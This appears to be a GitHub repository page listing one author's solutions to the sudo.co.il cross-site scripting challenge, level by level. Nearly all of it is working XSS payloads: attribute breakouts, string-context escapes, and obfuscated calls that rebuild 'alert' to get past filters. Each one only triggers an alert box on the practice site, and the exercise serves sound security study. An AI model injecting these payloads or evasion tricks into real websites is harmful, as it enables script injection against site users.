Giters

0xshahriar / sudo.co.il

This is a repo of my solution of one XSS challenge website (http://sudo.co.il/xss/) . This challenges may have different types of solutions. My solutions are not the only one. So, keep searching & keep sharing.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

0xshahriarcross-site-scriptingxssxss-exploitationxss-injectionxss-payloadsxss-poc

Solutions of XSS Challenges of http://sudo.co.il/xss/

**Our mission is to popup window with document.domain (sudo.co.il) without any kind of user interaction **

  • Level 0
<script>alert(document.domain)</script>
  • Level 1
"><script>alert(document.domain)</script>
  • Level 2
" autofocus onfocus="alert(document.domain)
  • Level 3
"autofocus/onfocus="alert(document.domain)
  • Level 4
"autofocus/onfocus="confirm&#40;document.domain&#41;
  • Level 5.1
'-alert(document.domain)-'
  • Level 5.2
\'-alert(document.domain);<!--
  • Level 6
\'-alert(document.domain);//
  • Level 7
" autofocus="" onfocus="alert(document.domain)
  • Level 8
"};this[8680439..toString(30)](document.domain);//
  • Level 8.1
"};this[8680439..toString(30)](document.domain);{"
  • Level 9
'};this[8680439..toString(30)](document.domain);{'
  • Level 10
';this[8680439..toString(30)](document.domain);//'

or,

x';x=top["al"%2B"ert"](document.domain);//

or,

x';x=this["al"%2B"ert"](document.domain);//
  • Level 11
#<script>alert(document.domain)</script>

About

This is a repo of my solution of one XSS challenge website (http://sudo.co.il/xss/) . This challenges may have different types of solutions. My solutions are not the only one. So, keep searching & keep sharing.

0xshahriarcross-site-scriptingxssxss-exploitationxss-injectionxss-payloadsxss-poc